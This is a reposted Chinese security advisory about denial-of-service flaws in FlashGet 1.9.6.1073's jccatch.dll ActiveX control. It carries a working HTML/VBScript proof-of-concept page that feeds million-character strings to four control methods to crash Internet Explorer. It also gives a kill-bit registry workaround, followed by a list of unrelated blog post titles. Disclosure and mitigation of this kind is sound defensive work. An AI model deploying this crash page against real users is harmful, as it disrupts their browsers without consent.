FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞
来源:互联网 发布:小米手机网络短信 编辑:程序博客网 时间:2024/05/22 17:00
Submitted by 7jdg on 2007, October 20, 3:00 PM. 溢出
受影响的系统
FlashGet 1.9.6.1073
描述:
FlashGet -全球最多人使用的下载工具。可支持多种资源格式。
IE浏览器在以畸形参数调用FlashGet的jccatch.dll ActiveX控件时存在漏洞,恶意网站可能利用此漏洞导致用户浏览器崩溃。
如果用户受骗打开了恶意的WEB页面的话,就会触发这个漏洞,导致浏览器崩溃。
测试方法
XML/HTML代码
- -----------------------------------------------------------------------------<br>
- FlashGet jccatch.dll multiple methods Denial of Service<br>
- site: http://1v1.name<br>
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6<br>
- -----------------------------------------------------------------------------<br>
- <object classid='clsid:FB5DA724-162B-11D3-8B9B-AA70B4B0B524' id='FlashGet'></object>
- <select name="Pucca">
- <option value = "AddUrl">AddUrl</option>
- <option value = "AddFgUrl">AddFgUrl</option>
- <option value = "IsUrlExist">IsUrlExist</option>
- <option value = "Initialize">Initialize</option>
- </select>
- <input language=VBScript onclick=tryMe() type=button value="测试">
- <script language='vbscript'>
- Sub tryMe
- on error resume next
- if Pucca.value="AddUrl" then
- argCount = 3
- arg1="defaultV"
- arg2="defaultV"
- arg3=String(1000000, "A")
- FlashGet.AddUrl arg1 ,arg2 ,arg3
- elseif Pucca.value="AddFgUrl" then
- argCount = 3
- arg1="defaultV"
- arg2="defaultV"
- arg3=String(1000000, "A")
- FlashGet.AddFgUrl arg1 ,arg2 ,arg3
- elseif Pucca.value="IsUrlExist" then
- argCount = 1
- arg1=String(1000000, "A")
- FlashGet.IsUrlExist arg1
- elseif Pucca.value = "Initialize" then
- argCount = 2
- arg1="defaultV"
- arg2=String(1000000, "A")
- FlashGet.Initialize arg1 ,arg2
- end if
- End Sub
- </script>
临时解决方法:
在IE中禁用 FlashGet jccatch.dll ActiveX控件,为以下CLSID设置kill bit:
{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}
或将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{FB5DA724-162B-11D3-8B9B-AA70B4B0B524}]
"Compatibility Flags"=dword:00000400
- FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞
- 免杀迅雷PPLAYER.DLL ActiveX控件溢出漏洞
- ActiveX控件漏洞学习
- ActiveX 控件漏洞挖掘方法
- ActiveX 控件漏洞挖掘方法
- 制作DLL或者ACTIVEX控件
- WIN32 DLL调用ACTIVEX控件
- ActiveX控件,ActiveX DLL,ActiveX EXE之间的差别~~
- 迅雷ActiveX控件远程代码执行漏洞
- Linux Kernel拒绝服务漏洞
- 短信拒绝服务漏洞
- 费尔V8智能杀毒多处内核拒绝服务漏洞
- DLL+ ActiveX控件+WEB页面调用例子
- DLL+ ActiveX控件+WEB页面调用例子
- DLL+ ActiveX控件+WEB页面调用例子
- DLL+ ActiveX控件+WEB页面调用例子
- DLL+ ActiveX控件+WEB页面调用例子
- DLL+ ActiveX控件+WEB页面调用例子
- 一个比较容易调用 功能比较完善的 cookie 操作类 附带一些简单的应用示例
- java的位移符号
- C++点点1
- C++复习 01 快速入门
- 关闭硬盘AutoRun功能
- FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞
- 常用数据入sde库的代码
- 将 Oracle Spatial 与 Google Earth 集成
- 新开BLOG
- 通过窗体向EXCEL表单添加数据
- 开启sql2005远程连接功能
- 智力题-秤球
- 这是我博客,欢迎大家来浏览
- 关于window.showModalDialog 的简单应用,父子窗口之间的传递